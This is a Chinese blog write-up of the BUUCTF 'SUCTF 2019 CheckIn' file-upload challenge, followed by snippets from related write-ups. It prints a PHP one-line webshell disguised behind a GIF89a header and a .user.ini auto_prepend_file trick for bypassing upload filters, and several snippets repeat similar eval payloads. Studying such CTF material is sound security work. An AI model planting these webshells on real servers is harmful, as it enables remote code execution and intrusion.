BUUCTF闯关日记--[SUCTF 2019]CheckIn1()

最新推荐文章于 2022-10-12 12:05:32 发布
最新推荐文章于 2022-10-12 12:05:32 发布
阅读量266 收藏
点赞数 2
文章标签: 安全 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/124849343
版权

这题依旧不是自己做出来的,难过的是没做出来,值得高兴的是掌握了新姿势

进入页面叫你上传文件,肯定就是文件上传漏洞,所以我就开始逐个试

1. 发现.htaccess文件传不了

2. 含有 <? 的文件传不了

首先先解决第一个问题:

一.如果.htaccess文件传不了以我现有的知识只有两个方法:

1.传输.jpg文件,但是内容只含有一句话木马,可以直接连接菜刀

2.依靠CGI解析漏洞,简单来说就是原来访问1.jpg是图片,但是访问1.jpg/.php就是php文件了

但是现有知识解决不了,于是有一个新的姿势:

那就是.user.ini文件(这也是一种配置文件)

这个文件有什么用呢,就是把你指定的文件当作php执行

---------------------------------------------------

那么第二个问题:

<?文件 不能传

试试这样 写一句话木马:

<script language='php'>eval($_REQUEST[8]);</script>

---------------------------------------------------

于是解决这两个问题,可以开始解题

这是.user.ini的文件内容:

GIF89a
auto_prepend_file=shell.jpg(你传入的木马图片的名称)

这是shell.jpg的内容

GIF89a
<script language='php'>eval($_REQUEST[8]);</script>

然后分别把两个文件上传

然后访问uploads/cc551ab005b2e60fbdc88de809b2c4b1/index.php让他解析我们的文件

再访问uploads/cc551ab005b2e60fbdc88de809b2c4b1

可以发现

于是就可以连接菜刀,拿到flag 

 

flag{ccde253f-d5ba-4742-9bce-40624c4af6a5}

 

清风--
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
liang-chen-yun-checkin
03-31
报到1:前叉仓库2:在仓库的秘密中记录账号密码设置->秘密2.1: 添加 EMAIL2.2: 添加 PASSWORD
blockchain-relay-rn-checkin:lock区块链研究案例
05-12
区块链+中继+ ReactNative :globe_showing_Europe-Africa: 区块链研究案例为什么? 这只是一个仓库,可以分享我想做的事情并询问其他开发人员的想法缺少了什么? 区块链,思考和研究坚固性
buuctf-web-[SUCTF 2019]CheckIn1
mlws1900的博客
08-11 418
类似的思路就是index.php把1.jpg进行文件包含,1.jpg里面的内容就以php代码执行,于是getshell。,对GIF89a进行检测(exif_imagetype)这题目环境好像有问题一样,做着做着就自动刷新了上传的马,还好截图快。上传文件,上传一个空的jpg文件,发现not image。exif_imagetype -- 判断一个图像的类型。然后先上传user.ini然后上传jpg文件。文件上传漏洞之user.ini留后门。做一个.user.ini文件。进入根目录找到flag即可。
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2193
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
BUUCTF——[SUCTF 2019]CheckIn 1
小白一枚多多关注的博客
04-12 1444
这道题应为我的理论限制,所以做了段时间才做出来,这道题它有两个知识前提,第一个就是.user.ini和图片文件头欺骗,这两点在这里有着举足轻重得作用,可以说不了解这两点就大概率得做不出这道题,前置知识点我也没咋理解好,但是这里有一篇写得不错得文章推荐给你门看看: .user.ini得作用以及配置 图片文件头欺骗 前置知识点知道后,那就开始进入环境并且解体了 进入环境后我们会看见一个文件上传得网页,当我一看到这个网页得时候我的第一想法就是文件上传漏洞,当然最后的实验结果也确实是这个漏洞,不过它这里用了一个p
web buuctf [SUCTF 2019]CheckIn1
weixin_44214568的博客
03-15 1512
如图,应该是一个文件上传的题目; 1.上传一句话木马: 上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤 改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤 2.改文件头GIF89a?<script language="php">eval($_post['a']);</script> 上传后提示 能够看到文件上传的路径,和文件所在位..
BUUCTF-CheckIn
m0_47571887的博客
11-09 782
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
BUUCTF Web [SUCTF 2019]CheckIn1
网安小趴菜
09-09 387
上传成功,访问一下.htaccess,神奇的是直接下载了一个index.htaccess文件,感觉是没戏了,抱着试一试的态度访问了一下图片马,果然,还是jpg无法解析。此时访问上传jpg文件是无法解析我们的php代码的,需要再上传个.htaccess文件(前面也要加上文件头)既然不能通过.htaccess的方法解析图片马,那就搜一下大佬的wp,发现他们都用了.user.ini方法。上传成功,但图片马好像没了,还需要再传一次,上传成功,先访问一下index.php,蚁剑连接。启动靶机,直接尝试传木马。
genshin-mys-checkin:【蚊子的腿也是腿】原神米游社每日签到,原神微博超话签到,领取礼包,自动推送
03-08
genshin-mys-checkin 每天早上7:00〜7:10随机时间签到 部分失败不会使整体流程终止,和你会收到消息来自GitHub的Actions失败提醒邮件 运行前会自动同步主仓库,并使用主仓库文件解决冲突,如有自定义需求请自行修改...
hence-flight-checkin
05-06
link rel =" import " href =" bower_components/hence-flight-checkin/hence-flight-checkin.html " >发展所有开发都是利用/ src和/ test文件夹中的文件进行的。依存关系元素依赖关系通过NPM& 进行管理。 您...
gadget-checkin:OmniUpdate的小工具,只需单击一下,即可检入一个站点或所有站点中的所有文件
04-28
小工具签入v1.0.1 该小工具将显示当前在每个站点中向用户签出的文件数,并为用户提供将其全部签回的选项。 版本v1.0.1 v1不再处于开发阶段,已经准备好迎接黄金时代! 此小工具已更新两年多了。...
BUUCTF [SUCTF 2019]CheckIn 1
weixin_45642610的博客
01-17 685
BUUCTF [SUCTF 2019]CheckIn 1 文件包含,一句话木马上传。 直接上传一句话木马<?php eval($_POST['a']);?> 非法后缀 那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp 都试试,都不行。 这时候可以用图片上传。 在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入 GIF89a <script language=php>eval($_POST['a']);&l
web做题小收获
qq_63267612的博客
04-16 2505
文章目录http头 刷题后发现很多东西都不会,百度学习了一些 http头 一些常见的http头 text/html : HTML格式 text/plain :纯文本格式 text/xml : XML格式 image/gif:gif图片格式 image/jpeg :jpg图片格式 image/png:png图片格式 GIF ...
buu [GXYCTF2019]CheckIn
ao52426055的博客
11-30 1403
查看题目 刚开始我以为是base64,结果解密出来一堆乱码 然后又试了一下凯撒也不行 那就只有试一下ROT-N了 为rot -47加密:flag{Y0u_kNow_much_about_Rot}
BUUCTF_web_CheckIn
silence1_的博客
08-31 2178
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
BUUCTF:[SUCTF 2019]CheckIn
末初的CSDN博客
11-04 1275
题目地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 上传文件后缀名黑名单机制,常用php及相关可解析扩展名等无法成功上传 使用.user.ini构造后门 user.ini如何构造后门详情见P神:https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html 首先制造图片马 图片马不能包含<?,使用 <script language="php">eval($.
BUUCTF[SUCTF 2019]CheckIn1
m0_62094846的博客
12-13 184
上传非图片会显示not image 上传图片会显示in contents,看来图片要包含可以用.user.ini包含 但非图片不允许上传,就加GIF89a文件头试试 看到路径中有php也确定就是用.user.ini 再传cc.jpg 最后添加路径,注意文件是index.php,cc.jpg是包含在里面的 ...
Buuctf Crpyto writeup --[GXYCTF2019]CheckIn
10-12 387
dikqTCpfRjA8fUBIMD5GNDkWMjNARkUwIOBFTg==
BUUCTF_Crypto_[GXYCTF2019]CheckIn
qq_58370970的博客
11-17 1081
题目:给了一个txt文件 看到两个==,可以知道是base64加密,解密后 里面没有{}可以知道不是凯撒加密,没有=不是base64 但可以发现这里的每一个字符的ASCII在33-126 可以发现是ROT-N加密 ROT-N在线加密 解密后得到flag ...
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值